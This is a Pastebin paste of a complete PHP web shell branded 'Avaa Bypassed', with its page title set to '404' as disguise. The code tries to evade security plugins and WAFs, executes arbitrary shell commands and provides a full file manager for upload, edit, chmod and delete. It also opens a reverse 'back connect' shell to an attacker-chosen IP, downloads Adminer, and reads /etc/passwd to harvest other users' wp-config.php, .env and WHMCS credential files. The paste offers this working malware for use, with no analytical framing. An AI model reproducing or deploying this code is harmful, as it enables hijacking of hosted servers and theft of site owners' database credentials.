API tools faq
paste
Advertisement
Moslem1337

avaa

Moslem1337
Jan 7th, 2024
39
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.96 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. @ini_set('error_log', NULL);
  3. @ini_set('log_errors', 0);
  4. @ini_set('max_execution_time', 0);
  5. @error_reporting(0);
  6. @set_time_limit(0);
  7. if (function_exists('litespeed_request_headers')) {
  8. $headers = litespeed_request_headers();
  9. if (isset($headers['X-LSCACHE'])) {
  10. header('X-LSCACHE: off');
  11. }
  12. }
  13. if (defined('WORDFENCE_VERSION')) {
  14. define('WORDFENCE_DISABLE_LIVE_TRAFFIC', true);
  15. define('WORDFENCE_DISABLE_FILE_MODS', true);
  16. }
  17. if (function_exists('imunify360_request_headers') && defined('IMUNIFY360_VERSION')) {
  18. $imunifyHeaders = imunify360_request_headers();
  19. if (isset($imunifyHeaders['X-Imunify360-Request'])) {
  20. header('X-Imunify360-Request: bypass');
  21. }
  22. if (isset($imunifyHeaders['X-Imunify360-Captcha-Bypass'])) {
  23. header('X-Imunify360-Captcha-Bypass: ' . $imunifyHeaders['X-Imunify360-Captcha-Bypass']);
  24. }
  25. }
  26. if (function_exists('apache_request_headers')) {
  27. $apacheHeaders = apache_request_headers();
  28. if (isset($apacheHeaders['X-Mod-Security'])) {
  29. header('X-Mod-Security: ' . $apacheHeaders['X-Mod-Security']);
  30. }
  31. }
  32. if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && defined('CLOUDFLARE_VERSION')) {
  33. $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CF_CONNECTING_IP'];
  34. if (isset($apacheHeaders['HTTP_CF_VISITOR'])) {
  35. header('HTTP_CF_VISITOR: ' . $apacheHeaders['HTTP_CF_VISITOR']);
  36. }
  37. }
  38. function getFileDetails($path)
  39. {
  40. $folders = [];
  41. $files = [];
  42.  
  43. try {
  44. $items = @scandir($path);
  45. if (!is_array($items)) {
  46. throw new Exception('Failed to scan directory');
  47. }
  48.  
  49. foreach ($items as $item) {
  50. if ($item == '.' || $item == '..') {
  51. continue;
  52. }
  53.  
  54. $itemPath = $path . '/' . $item;
  55. $itemDetails = [
  56. 'name' => $item,
  57. 'type' => is_dir($itemPath) ? 'Folder' : 'File',
  58. 'size' => is_dir($itemPath) ? '' : formatSize(filesize($itemPath)),
  59. 'permission' => substr(sprintf('%o', fileperms($itemPath)), -4),
  60. ];
  61. if (is_dir($itemPath)) {
  62. $folders[] = $itemDetails;
  63. } else {
  64. $files[] = $itemDetails;
  65. }
  66. }
  67.  
  68. return array_merge($folders, $files);
  69. } catch (Exception $e) {
  70. return 'None';
  71. }
  72. }
  73. function formatSize($size)
  74. {
  75. $units = array('B', 'KB', 'MB', 'GB', 'TB');
  76. $i = 0;
  77. while ($size >= 1024 && $i < 4) {
  78. $size /= 1024;
  79. $i++;
  80. }
  81. return round($size, 2) . ' ' . $units[$i];
  82. }
  83. function executeCommand($command)
  84. {
  85. $currentDirectory = getCurrentDirectory();
  86. $command = "cd $currentDirectory && $command";
  87.  
  88. $output = '';
  89. $error = '';
  90.  
  91. // proc_open
  92. $descriptors = [
  93. 0 => ['pipe', 'r'],
  94. 1 => ['pipe', 'w'],
  95. 2 => ['pipe', 'w'],
  96. ];
  97.  
  98. $process = @proc_open($command, $descriptors, $pipes);
  99.  
  100. if (is_resource($process)) {
  101. fclose($pipes[0]);
  102.  
  103. $output = stream_get_contents($pipes[1]);
  104. fclose($pipes[1]);
  105.  
  106. $error = stream_get_contents($pipes[2]);
  107. fclose($pipes[2]);
  108.  
  109. $returnValue = proc_close($process);
  110.  
  111. $output = trim($output);
  112. $error = trim($error);
  113.  
  114. if ($returnValue === 0 && !empty($output)) {
  115. return $output;
  116. } elseif (!empty($error)) {
  117. return 'Error: ' . $error;
  118. }
  119. }
  120.  
  121. // shell_exec
  122. $shellOutput = @shell_exec($command);
  123. if ($shellOutput !== null) {
  124. $output = trim($shellOutput);
  125. if (!empty($output)) {
  126. return $output;
  127. }
  128. } else {
  129. $error = error_get_last();
  130. if (!empty($error)) {
  131. return 'Error: ' . $error['message'];
  132. }
  133. }
  134.  
  135. // exec
  136. @exec($command, $execOutput, $execStatus);
  137. if ($execStatus === 0) {
  138. $output = implode(PHP_EOL, $execOutput);
  139. if (!empty($output)) {
  140. return $output;
  141. }
  142. } else {
  143. return 'Error: Command execution failed.';
  144. }
  145.  
  146. // passthru
  147. ob_start();
  148. @passthru($command, $passthruStatus);
  149. $passthruOutput = ob_get_clean();
  150. if ($passthruStatus === 0) {
  151. $output = $passthruOutput;
  152. if (!empty($output)) {
  153. return $output;
  154. }
  155. } else {
  156. return 'Error: Command execution failed.';
  157. }
  158.  
  159. // system
  160. ob_start();
  161. @system($command, $systemStatus);
  162. $systemOutput = ob_get_clean();
  163. if ($systemStatus === 0) {
  164. $output = $systemOutput;
  165. if (!empty($output)) {
  166. return $output;
  167. }
  168. } else {
  169. return 'Error: Command execution failed.';
  170. }
  171.  
  172. return 'Error: Command execution failed.';
  173. }
  174. function readFileContent($file)
  175. {
  176. return file_get_contents($file);
  177. }
  178.  
  179. function saveFileContent($file)
  180. {
  181. if (isset($_POST['content'])) {
  182. return file_put_contents($file, $_POST['content']) !== false;
  183. }
  184. return false;
  185. }
  186. function uploadFile($targetDirectory)
  187. {
  188. if (isset($_FILES['file'])) {
  189. $currentDirectory = getCurrentDirectory();
  190. $targetFile = $targetDirectory . '/' . basename($_FILES['file']['name']);
  191. if ($_FILES['file']['size'] === 0) {
  192. return 'Open Ur Eyes Bitch !!!.';
  193. } else {
  194. if (move_uploaded_file($_FILES['file']['tmp_name'], $targetFile)) {
  195. return 'File uploaded successfully.';
  196. } else {
  197. return 'Error uploading file.';
  198. }
  199. }
  200. return '';
  201. }
  202. }
  203. function changeDirectory($path)
  204. {
  205. if ($path === '..') {
  206. @chdir('..');
  207. } else {
  208. @chdir($path);
  209. }
  210. }
  211. function getCurrentDirectory()
  212. {
  213. return realpath(getcwd());
  214. }
  215. function getLink($path, $name)
  216. {
  217. if (is_dir($path)) {
  218. return '<a href="?dir=' . urlencode($path) . '">' . $name . '</a>';
  219. } elseif (is_file($path)) {
  220. return '<a href="?dir=' . urlencode(dirname($path)) . '&amp;read=' . urlencode($path) . '">' . $name . '</a>';
  221.  
  222. }
  223. }
  224. function getDirectoryArray($path)
  225. {
  226. $directories = explode('/', $path);
  227. $directoryArray = [];
  228. $currentPath = '';
  229. foreach ($directories as $directory) {
  230. if (!empty($directory)) {
  231. $currentPath .= '/' . $directory;
  232. $directoryArray[] = [
  233. 'path' => $currentPath,
  234. 'name' => $directory,
  235. ];
  236. }
  237. }
  238. return $directoryArray;
  239. }
  240. function showBreadcrumb($path)
  241. {
  242. $path = str_replace('\\', '/', $path);
  243. $paths = explode('/', $path);
  244. ?>
  245. <div class="breadcrumb">
  246. <?php foreach ($paths as $id => $pat) { ?>
  247. <?php if ($pat == '' && $id == 0) { ?>
  248. DIR : <a href="?dir=/">/</a>
  249. <?php } ?>
  250. <?php if ($pat == '') {
  251. continue;
  252. } ?>
  253. <?php $linkPath = implode('/', array_slice($paths, 0, $id + 1)); ?>
  254. <a href="?dir=<?php echo urlencode($linkPath); ?>"><?php echo $pat; ?></a>/
  255. <?php } ?>
  256. </div>
  257. <?php
  258. }
  259. function showFileTable($path)
  260. {
  261. $fileDetails = @getFileDetails($path);
  262. ?>
  263. <table>
  264. <tr>
  265. <th>Name</th>
  266. <th>Type</th>
  267. <th>Size</th>
  268. <th>Permission</th>
  269. <th>Actions</th>
  270. </tr>
  271. <?php if (is_array($fileDetails)) { ?>
  272. <?php foreach ($fileDetails as $fileDetail) { ?>
  273. <tr>
  274. <td>
  275. <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
  276. <circle cx="12" cy="12" r="10"></circle>
  277. <line x1="12" y1="16" x2="12" y2="12"></line>
  278. <line x1="12" y1="8" x2="12" y2="8"></line>
  279. </svg>
  280. <?php echo getLink($path . '/' . $fileDetail['name'], $fileDetail['name']); ?></td>
  281.  
  282. <td>
  283. <?php echo $fileDetail['type']; ?></td>
  284. <td><?php echo $fileDetail['size']; ?></td>
  285. <td>
  286. <?php
  287. $permissionColor = @is_writable($path . '/' . $fileDetail['name']) ? 'green' : 'red';
  288. ?>
  289. <span style="color: <?php echo $permissionColor; ?>"><?php echo $fileDetail['permission']; ?></span>
  290. </td>
  291. <td>
  292.  
  293. <?php if ($fileDetail['type'] === 'File') { ?>
  294. <div class="dropdown">
  295. <select onchange="location.href = this.value;">
  296. <option value="" selected disabled>Action : </option>
  297. <option value="?dir=<?php echo urlencode($path); ?>&edit=<?php echo urlencode($path . '/' . $fileDetail['name']); ?>">Edit</option>
  298. <option value="?dir=<?php echo urlencode($path); ?>&rename=<?php echo urlencode($fileDetail['name']); ?>">Rename</option>
  299. <option value="?dir=<?php echo urlencode($path); ?>&chmod=<?php echo urlencode($fileDetail['name']); ?>">Chmod</option>
  300. <option value="?dir=<?php echo urlencode($path); ?>&delete=<?php echo urlencode($fileDetail['name']); ?>">Delete</option>
  301. </select>
  302. </div>
  303. <?php } ?>
  304. <?php if ($fileDetail['type'] === 'Folder') { ?>
  305. <div class="dropdown">
  306. <select onchange="location.href = this.value;">
  307. <option value="" selected disabled>Action : </option>
  308. <option value="?dir=<?php echo urlencode($path); ?>&rename=<?php echo urlencode($fileDetail['name']); ?>">Rename</option>
  309. <option value="?dir=<?php echo urlencode($path); ?>&chmod=<?php echo urlencode($fileDetail['name']); ?>">Chmod</option>
  310. <option value="?dir=<?php echo urlencode($path); ?>&delete=<?php echo urlencode($fileDetail['name']); ?>">Delete</option>
  311. </select>
  312. </div>
  313. <?php } ?>
  314. </td>
  315. </tr>
  316. <?php } ?>
  317. <?php } else { ?>
  318. <tr>
  319. <td colspan="5">None</td>
  320. </tr>
  321. <?php } ?>
  322. </table>
  323. <?php
  324. }
  325. function changePermission($path)
  326. {
  327. if (!file_exists($path)) {
  328. return 'File or directory does not exist.';
  329. }
  330.  
  331. $permission = isset($_POST['permission']) ? $_POST['permission'] : '';
  332.  
  333. if ($permission === '') {
  334. return 'Invalid permission value.';
  335. }
  336.  
  337. if (!is_dir($path) && !is_file($path)) {
  338. return 'Cannot change permission. Only directories and files can have permissions modified.';
  339. }
  340.  
  341. $parsedPermission = intval($permission, 8);
  342. if ($parsedPermission === 0) {
  343. return 'Invalid permission value.';
  344. }
  345.  
  346. if (chmodRecursive($path, $parsedPermission)) {
  347. return 'Permission changed successfully.';
  348. } else {
  349. return 'Error changing permission.';
  350. }
  351. }
  352. function chmodRecursive($path, $permission)
  353. {
  354. if (is_dir($path)) {
  355. $items = @scandir($path);
  356. if ($items === false) {
  357. return false;
  358. }
  359.  
  360. foreach ($items as $item) {
  361. if ($item == '.' || $item == '..') {
  362. continue;
  363. }
  364.  
  365. $itemPath = $path . '/' . $item;
  366.  
  367. if (is_dir($itemPath)) {
  368. if (!chmod($itemPath, $permission)) {
  369. return false;
  370. }
  371.  
  372. if (!chmodRecursive($itemPath, $permission)) {
  373. return false;
  374. }
  375. } else {
  376. if (!chmod($itemPath, $permission)) {
  377. return false;
  378. }
  379. }
  380. }
  381. } else {
  382. if (!chmod($path, $permission)) {
  383. return false;
  384. }
  385. }
  386.  
  387. return true;
  388. }
  389. function renameFile($oldName, $newName)
  390. {
  391. if (file_exists($oldName)) {
  392. $directory = dirname($oldName);
  393. $newPath = $directory . '/' . $newName;
  394. if (@rename($oldName, $newPath)) {
  395. return 'File or folder renamed successfully.';
  396. } else {
  397. return 'Error renaming file or folder.';
  398. }
  399. } else {
  400. return 'File or folder does not exist.';
  401. }
  402. }
  403. function deleteFile($file)
  404. {
  405. if (file_exists($file)) {
  406. if (@unlink($file)) {
  407. return 'File deleted successfully.' . $file;
  408. } else {
  409. return 'Error deleting file.';
  410. }
  411. } else {
  412. return 'File does not exist.';
  413. }
  414. }
  415. function deleteFolder($folder)
  416. {
  417. if (is_dir($folder)) {
  418. $files = @glob($folder . '/*');
  419. foreach ($files as $file) {
  420. is_dir($file) ? deleteFolder($file) : unlink($file);
  421. }
  422. if (@rmdir($folder)) {
  423. return 'Folder deleted successfully.' . $folder;
  424. } else {
  425. return 'Error deleting folder.';
  426. }
  427. } else {
  428. return 'Folder does not exist.';
  429. }
  430. }
  431. $currentDirectory = getCurrentDirectory();
  432. $errorMessage = '';
  433. $responseMessage = '';
  434. if (isset($_GET['dir'])) {
  435. changeDirectory($_GET['dir']);
  436. $currentDirectory = getCurrentDirectory();
  437. }
  438. if (isset($_GET['edit'])) {
  439. $file = $_GET['edit'];
  440. $content = readFileContent($file);
  441. if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  442. $saved = saveFileContent($file);
  443. if ($saved) {
  444. $responseMessage = 'File saved successfully.' . $file;
  445. } else {
  446. $errorMessage = 'Error saving file.';
  447. }
  448. }
  449. }
  450. if (isset($_GET['chmod'])) {
  451. $file = $_GET['chmod'];
  452. if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  453. $responseMessage = changePermission($file);
  454. }
  455. }
  456. if (isset($_POST['upload'])) {
  457. $responseMessage = uploadFile($currentDirectory);
  458. }
  459. if (isset($_POST['cmd'])) {
  460. $cmdOutput = executeCommand($_POST['cmd']);
  461. }
  462.  
  463. if (isset($_GET['rename'])) {
  464. $file = $_GET['rename'];
  465. if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  466. $newName = @$_POST['new_name'];
  467. if (is_file($file) || is_dir($file)) {
  468. $responseMessage = renameFile($file, $newName);
  469. } else {
  470. $errorMessage = 'File or folder does not exist.';
  471. }
  472. }
  473. }
  474. if (isset($_GET['delete'])) {
  475. $file = $_GET['delete'];
  476. if ($_SERVER['REQUEST_METHOD'] === 'GET') {
  477. $currentDirectory = getCurrentDirectory();
  478. if (is_file($file)) {
  479. $responseMessage = deleteFile($file);
  480. echo "<script>alert('File dihapus');window.location='?dir=" . urlencode($currentDirectory) . "';</script>";
  481. exit;
  482. } elseif (is_dir($file)) {
  483. $responseMessage = deleteFolder($file);
  484. echo "<script>alert('Folder dihapus');window.location='?dir=" . urlencode($currentDirectory) . "';</script>";
  485. exit;
  486. } else {
  487. $errorMessage = 'File or folder does not exist.';
  488. }
  489. }
  490. }
  491. if (isset($_POST['Summon'])) {
  492. $baseUrl = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php';
  493. $currentPath = @getCurrentDirectory();
  494.  
  495. $fileUrl = $baseUrl;
  496. $fileName = 'adminer.php';
  497.  
  498. $filePath = $currentPath . '/' . $fileName;
  499.  
  500. $fileContent = @file_get_contents($fileUrl);
  501. if ($fileContent !== false) {
  502. if (@file_put_contents($filePath, $fileContent) !== false) {
  503.  
  504. $responseMessage = 'File "' . $fileName . '" summoned successfully. <a href="' . $filePath . '">' . $filePath . '</a>';
  505. } else {
  506. $errorMessage = 'Failed to save the summoned file.';
  507. }
  508. } else {
  509. $errorMessage = 'Failed to fetch the file content. None File';
  510. }
  511. }
  512. if (isset($_POST['bind'])) {
  513. $errorMessage = '<p>Attempting Connection...</p>';
  514. $ip = $_POST['ip'];
  515. $port = (int)$_POST['port']; // Convert port to an integer
  516. $sockfd = @fsockopen($ip, $port, $errno, $errstr);
  517.  
  518. if ($errno != 0) {
  519. $errorMessage = "<font color='red'>$errno : $errstr</font>";
  520. } else if (!$sockfd) {
  521. $errorMessage = "<p>Unexpected error has occurred, connection may have failed.</p>";
  522. } else {
  523. fputs($sockfd, "{################################################################}\n");
  524. fputs($sockfd, "..:: Bypass By Avacostn ::..\n");
  525. fputs($sockfd, "\n=> Backconnect\n=> Back\n\n");
  526. fputs($sockfd, "{################################################################}\n\n");
  527.  
  528. $dir = @shell_exec("pwd");
  529. $sysinfo = @shell_exec("uname -a");
  530. $time = @shell_exec("time");
  531. $len = 1337;
  532.  
  533. fputs($sockfd, "User connected @ $time\n\n");
  534.  
  535. while (!feof($sockfd)) {
  536. $cmdPrompt = '[AvaaCode]#:> ';
  537. fputs($sockfd, $cmdPrompt);
  538. $command = @fgets($sockfd, $len);
  539. fputs($sockfd, "\n" . @shell_exec($command) . "\n\n");
  540. }
  541. fclose($sockfd);
  542.  
  543. // Add success message here if needed
  544. $responseMessage = "<p>Connection successful!</p>";
  545. }
  546.  
  547. echo $errorMessage;
  548. }
  549. if (isset($_POST['create_file']) && isset($_GET['create']) && $_GET['create'] === 'file') {
  550. $fileName = $_POST['file_name'];
  551. $currentDirectory = @getCurrentDirectory();
  552. $filePath = $currentDirectory . '/' . $fileName;
  553.  
  554. if (!file_exists($filePath)) {
  555. if (@file_put_contents($filePath, '') !== false) {
  556. $responseMessage = 'File created successfully: ' . $fileName;
  557. } else {
  558. $errorMessage = 'Failed to create file.';
  559. }
  560. } else {
  561. $errorMessage = 'File already exists: ' . $fileName;
  562. }
  563. }
  564. if (isset($_POST['create_folder']) && isset($_GET['create']) && $_GET['create'] === 'folder') {
  565. $folderName = $_POST['folder_name'];
  566. $currentDirectory = @getCurrentDirectory();
  567. $folderPath = $currentDirectory . '/' . $folderName;
  568. if (!file_exists($folderPath)) {
  569. if (@mkdir($folderPath)) {
  570. $responseMessage = 'Folder created successfully: ' . $folderName;
  571. } else {
  572. $errorMessage = 'Failed to create folder.';
  573. }
  574. } else {
  575. $errorMessage = 'Folder already exists: ' . $folderName;
  576. }
  577. }
  578. if(isset($_GET['goo']) && $_GET['goo'] == 'config') {
  579. $etc = @fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  580. $con = @mkdir("Avaa_configs", 0777);
  581. $isi_htc = "Options all\nDirectoryIndex doesntexist.htm\nSatisfy Any";
  582. $htc = fopen("Avaa_configs/.htaccess", "w");
  583. @fwrite($htc, $isi_htc);
  584.  
  585. while ($passwd = fgets($etc)) {
  586. if ($passwd == "" || !$etc) {
  587. echo "<font color=red>Can't read /etc/passwd</font>";
  588. } else {
  589. preg_match_all('/(.*?):x:/', $passwd, $user_Avaaconfigfig);
  590.  
  591. foreach ($user_Avaaconfigfig[1] as $user_Avaaconfig) {
  592. $user_Avaaconfigfig_dir = "/home/$user_Avaaconfig/public_html/";
  593.  
  594. if (is_readable($user_Avaaconfigfig_dir)) {
  595. $grab_config = [
  596. "/home/$user_Avaaconfig/public_html/wp-config.php" => "wordpress",
  597. "/home/$user_Avaaconfig/public_html/configuration.php" => "joomla-or-whmcs",
  598. "/home/$user_Avaaconfig/public_html/blog/wp-config.php" => "wordpress",
  599. "/home/$user_Avaaconfig/public_html/blog/configuration.php" => "joomla",
  600. "/home/$user_Avaaconfig/public_html/wp/wp-config.php" => "wordpress",
  601. "/home/$user_Avaaconfig/public_html/wordpress/wp-config.php" => "wordpress",
  602. "/home/$user_Avaaconfig/public_html/config.php" => "4images",
  603. "/home/$user_Avaaconfig/public_html/whmcs/configuration.php" => "whmcs",
  604. "/home/$user_Avaaconfig/public_html/support/configuration.php" => "supportwhmcs",
  605. "/home/$user_Avaaconfig/public_html/secure/configuration.php" => "securewhmcs",
  606. "/home/$user_Avaaconfig/public_html/clients/configuration.php" => "clientswhmcs",
  607. "/home/$user_Avaaconfig/public_html/client/configuration.php" => "clientwhmcs",
  608. "/home/$user_Avaaconfig/public_html/billing/configuration.php" => "billingwhmcs",
  609. "/home/$user_Avaaconfig/public_html/admin/config.php" => "Opencart",
  610. "/home/$user_Avaaconfig/public_html/.env" => "env",
  611. "/home/$user_Avaaconfig/public_html/application/config/database.php" => "elisab",
  612. "/home/$user_Avaaconfig/public_html/includes/config.php" => "forum"
  613. ];
  614.  
  615. foreach ($grab_config as $config => $nama_config) {
  616. $ambil_config = @file_get_contents($config);
  617.  
  618. if ($ambil_config == '') {
  619. if ($ambil_config !== false) {
  620. } else {
  621.  
  622. $file_config = @fopen("Avaa_configs/$user_Avaaconfig-$nama_config.txt", "w");
  623. @fputs($file_config, $ambil_config);
  624. }
  625. }
  626. }
  627. }
  628. }
  629. }
  630. }
  631. $responseMessage = "<center><a href='?dir=$currentDirectory/Avaa_configs'>Done Touch Me</a></center>";
  632. }
  633. if (isset($_POST['extract-zip'])) {
  634. $extractZipFile = $_FILES['extract-zip-file']['name'];
  635. $extractZipPath = $currentDirectory . '/' . $extractZipFile;
  636.  
  637. $zip = new ZipArchive;
  638. if ($zip->open($extractZipPath) === TRUE) {
  639. $zip->extractTo($currentDirectory);
  640. $zip->close();
  641. $responseMessage = 'ZIP file extracted successfully.';
  642. unlink($extractZipPath); // Delete the uploaded ZIP file after extraction
  643. } else {
  644. $errorMessage = 'Error extracting ZIP file.';
  645. }
  646. }
  647.  
  648. if (isset($_POST['zip'])) {
  649. $zipFile = $_POST['zip-file'];
  650. $zipFileName = $currentDirectory . '/' . basename($zipFile) . '.zip';
  651.  
  652. $zip = new ZipArchive;
  653. if ($zip->open($zipFileName, ZipArchive::CREATE) === TRUE) {
  654. if (is_dir($zipFile)) {
  655. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($zipFile));
  656. foreach ($files as $file) {
  657. if (!$file->isDir()) {
  658. $filePath = $file->getRealPath();
  659. $relativePath = substr($filePath, strlen($zipFile) + 1);
  660. $zip->addFile($filePath, $relativePath);
  661. }
  662. }
  663. } elseif (is_file($zipFile)) {
  664. $zip->addFile($zipFile, basename($zipFile));
  665. } else {
  666. $errorMessage = 'Invalid file or directory specified for zipping.';
  667. }
  668.  
  669. $zip->close();
  670. $responseMessage = 'Files zipped successfully. <a href="?dir=' . urlencode($currentDirectory) . '&read=' . urlencode($zipFileName) . '">Download ZIP</a>';
  671. } else {
  672. $errorMessage = 'Error zipping files.';
  673. }
  674. }
  675.  
  676. ?>
  677. <!DOCTYPE html>
  678. <html>
  679. <head>
  680. <title>404</title>
  681. <link rel="stylesheet" href="https://rawcdn.githack.com/Jenderal92/Blog-Gan/63073e604b81df6337c1917990a7330d46b22ae9/ganteng.css">
  682. </head>
  683. <body>
  684. <div class="container">
  685. <h1>[ Avaa Bypassed ]</h1>
  686.  
  687. <div class="menu-icon" onclick="toggleSidebar()"></div>
  688. <hr>
  689. <div class="button-container">
  690. <form method="post" style="display: inline-block;">
  691. <input type="submit" name="Summon" value="Adminer" class="summon-button">
  692. </form>
  693. <button type="button" onclick="window.location.href='?gas'" class="summon-button">Mail Test</button>
  694. <button type="button" onclick="window.location.href='?do=bc'" class="summon-button">BC</button>
  695. <button type="button" onclick="window.location.href='?dir=<?php echo $currentDirectory ?>&goo=config'" class="summon-button">Config</button>
  696. </div>
  697. <hr>
  698. <select onchange="location.href = this.value;">
  699. <option value="" selected disabled>Create File Or Folder</option>
  700. <option value="?dir=<?php echo $currentDirectory ?>&create=file">Create File</option>
  701. <option value="?dir=<?php echo $currentDirectory ?>&create=folder">Create Folder</option>
  702. </select>
  703. <select onchange="location.href = this.value;">
  704. <option value="" selected disabled>Zipping</option>
  705. <option value="?dir=<?php echo $currentDirectory ?>&hahay=unzip" <?php echo isset($_GET['hahay']) && $_GET['hahay'] === 'unzip' ? 'selected' : ''; ?>>Un ZIP</option>
  706. <option value="?dir=<?php echo $currentDirectory ?>&hahay=extract_zip" <?php echo isset($_GET['hahay']) && $_GET['hahay'] === 'extract_zip' ? 'selected' : ''; ?>>Extract ZIP</option>
  707. </select>
  708.  
  709.  
  710. <?php
  711. //mailer
  712. if (isset($_GET['gas'])) {
  713. if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  714. if (!empty($_POST['email'])) {
  715. $xx = rand();
  716. $subject = "Avaa Mailer Test - " . $xx;
  717. $message = "<html><body>";
  718. $message .= "<h1>Hello, Avaa Ganteng</h1>";
  719. $message .= "<p>from domain : " . $_SERVER['SERVER_NAME'] . "</p>";
  720. $message .= "<p>This is a test email sent from Avaa Mailer.</p>";
  721. $message .= "</body></html>";
  722. $headers = "MIME-Version: 1.0" . "\r\n";
  723. $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
  724. if (mail($_POST['email'], $subject, $message,$headers)) {
  725. echo "<b>Send a report to [" . $_POST['email'] . "] - $xx</b>";
  726. } else {
  727. echo "<p style='color: red;'>Failed to send the email.</p>";
  728. }
  729. } else {
  730. echo "<p style='color: red;'>Please provide an email address.</p>";
  731. }
  732. } else {
  733. ?>
  734. <h2>Mail Test :</h2>
  735. <form method="post">
  736. <input type="text" name="email" placeholder="Enter email" required>
  737. <input type="submit" value="Send test &raquo;">
  738. </form>
  739. <?php
  740. }
  741. }
  742. ?>
  743.  
  744. <?php if (!empty($errorMessage)) { ?>
  745. <p style="color: red;"><?php echo $errorMessage; ?></p>
  746. <?php } ?>
  747. <hr>
  748.  
  749.  
  750. <div class="upload-cmd-container">
  751. <div class="upload-form">
  752. <h2>Upload:</h2>
  753. <form method="post" enctype="multipart/form-data">
  754. <input type="file" name="file">
  755. <button class="button" type="submit" name="upload">Upload</button>
  756. </form>
  757. </div>
  758.  
  759. <div class="cmd-form">
  760. <h2>Command:</h2>
  761. <form method="post">
  762. <?php echo @get_current_user() . "@" . @$_SERVER['REMOTE_ADDR'] . ": ~ $"; ?><input type='text' size='30' height='10' name='cmd'>
  763. <input type="submit" class="empty-button">
  764.  
  765. </form>
  766. </div>
  767. </div>
  768.  
  769. <?php
  770. if (isset($_GET['do']) && ($_GET['do'] == 'bc')) {
  771. echo"<div id='command-output'>
  772. <h2>Back Connect</h2>
  773. <p>Back connect will allow you to enter system commands remotely.</p>
  774. <form method='post'>
  775. <table>
  776. <tr>
  777. <td>IP Address: </td>
  778. <td><input type='text' name='ip' style='border:1px solid #5C7296; color: #5C7296;background-color:#transparent;font-size:13px;'></td>
  779. </tr>
  780. <tr>
  781. <td>Port: </td>
  782. <td><input type='text' name='port' style='border:1px solid #5C7296; color: #5C7296;background-color:#transparent;font-size:13px;'></td>
  783. </tr>
  784. <tr>
  785. <td><input type='submit' name='bind' value='Open Connection' style='border:1px solid #5C7296; color: #5C7296;background-color:#transparent;font-size:13px;'></td>
  786. </tr>
  787. </table>
  788. </form></div>";}?>
  789. <?php
  790. if (isset($_GET['read'])) {
  791. $file = $_GET['read'];
  792. $content = readFileContent($file);
  793. if ($content !== false) {
  794. echo '<div class="command-output">';
  795. echo '<pre>' . htmlspecialchars($content) . '</pre>';
  796. echo '</div>';
  797. } else {
  798. echo 'Failed to read the file.';
  799. }
  800. }
  801. ?>
  802. <?php if (!empty($cmdOutput)) { ?>
  803. <h3>Command Output:</h3>
  804. <div class="command-output">
  805. <pre><?php echo htmlspecialchars($cmdOutput); ?></pre>
  806. </div>
  807. <?php } ?>
  808.  
  809. <?php if (!empty($responseMessage)) { ?>
  810. <p class="response-message" style="color: green;"><?php echo $responseMessage; ?></p>
  811. <?php } ?>
  812. <?php if (isset($_GET['create']) && $_GET['create'] === 'file') { ?>
  813. <div class="rename-form">
  814. <h2>Create File:</h2>
  815. <form method="post">
  816. <input type="text" name="file_name" placeholder="New File Name">
  817. <input type="submit" value="Create File" name="create_file" class="button">
  818. </form>
  819. </div>
  820. <?php } ?>
  821.  
  822. <?php if (isset($_GET['create']) && $_GET['create'] === 'folder') { ?>
  823. <div class="rename-form">
  824. <h2>Create Folder:</h2>
  825. <form method="post">
  826. <input type="text" name="folder_name" placeholder="New Folder Name">
  827. <input type="submit" value="Create Folder" name="create_folder" class="button">
  828. </form>
  829. </div>
  830. <?php } ?>
  831. <?php if (isset($_GET['rename'])) { ?>
  832. <div class="rename-form">
  833. <h2>Rename File or Folder: <?php echo basename($file); ?></h2>
  834. <form method="post">
  835. <input type="text" name="new_name" placeholder="New Name" required>
  836. <br>
  837. <input type="submit" value="Rename" class="button">
  838. <a href="?dir=<?php echo urlencode(dirname($file)); ?>" class="button">Cancel</a>
  839. </form>
  840. </div>
  841. <?php } ?>
  842. <?php if (isset($_GET['edit'])) { ?>
  843. <div class="edit-file">
  844. <h2>Edit File: <?php echo basename($file); ?></h2>
  845. <form method="post">
  846. <textarea name="content" rows="10" cols="50"><?php echo htmlspecialchars($content); ?></textarea><br>
  847. <button class="button" type="submit">Save</button>
  848. </form>
  849. </div>
  850. <?php } elseif (isset($_GET['chmod'])) { ?>
  851. <div class="change-permission">
  852. <h2>Change Permission: <?php echo basename($file); ?></h2>
  853. <form method="post">
  854. <input type="hidden" name="chmod" value="<?php echo urlencode($file); ?>">
  855. <input type="text" name="permission" placeholder="Enter permission (e.g., 0770)">
  856. <button class="button" type="submit">Change</button>
  857. </form>
  858. </div>
  859. <?php } ?>
  860. <?php if (isset($_GET['hahay']) && $_GET['hahay'] == 'unzip') {?>
  861. <div class="extract-zip-form">
  862. <h2>Extract ZIP / Zip Files:</h2>
  863. <form method="post" enctype="multipart/form-data">
  864. <label for="extract-zip-file">Select ZIP File to Extract:</label>
  865. <input type="file" name="extract-zip-file">
  866. <button class="button" type="submit" name="extract-zip">Extract ZIP</button>
  867. </form>
  868. </div>
  869. <?php } elseif (isset($_GET['hahay']) && $_GET['hahay'] == 'extract_zip') {?>
  870. <h2>Zip Files / Directories:</h2>
  871. <form method="post">
  872. <label for="zip-file">Select File or Directory to Zip:</label>
  873. <input type="text" name="zip-file" placeholder="Enter file or directory path" required>
  874. <button class="button" type="submit" name="zip">Zip</button>
  875. </form>
  876.  
  877. <?php } ?>
  878.  
  879. <hr>
  880. </div>
  881.  
  882. <?php
  883. echo "<center>";
  884. echo "<h2>Filemanager</h2>";
  885. showBreadcrumb($currentDirectory);
  886. showFileTable($currentDirectory);
  887. echo "</center>";
  888. ?>
  889. </div>
  890.  
  891. <div class="sidebar" id="sidebar">
